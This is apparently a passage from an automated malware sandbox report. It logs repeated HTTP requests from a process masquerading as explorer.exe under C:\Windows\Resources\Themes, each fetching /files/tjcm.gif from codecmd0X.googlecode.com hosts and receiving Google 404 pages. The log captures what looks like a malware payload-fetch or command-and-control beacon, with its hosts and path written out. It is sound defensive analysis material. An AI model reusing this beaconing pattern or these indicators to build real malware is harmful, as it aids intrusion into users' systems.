                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:41.978563070 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          56192.168.2.45680864.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:42.341242075 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:43.117152929 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:42 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:43.117178917 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:18:43.117218018 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          57192.168.2.45681466.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:43.506222010 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:44.221028090 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:44 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:44.221074104 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          58192.168.2.45682074.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:44.554227114 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:45.259762049 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:45 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:45.259799004 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          59192.168.2.45683164.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:45.926723003 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:46.647850037 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:46 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:46.647919893 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          60192.168.2.45683766.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:47.004930973 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:47.730988979 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:47 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:47.731026888 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          61192.168.2.45684674.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:48.430083990 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:49.145817995 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:49 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:49.145833969 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


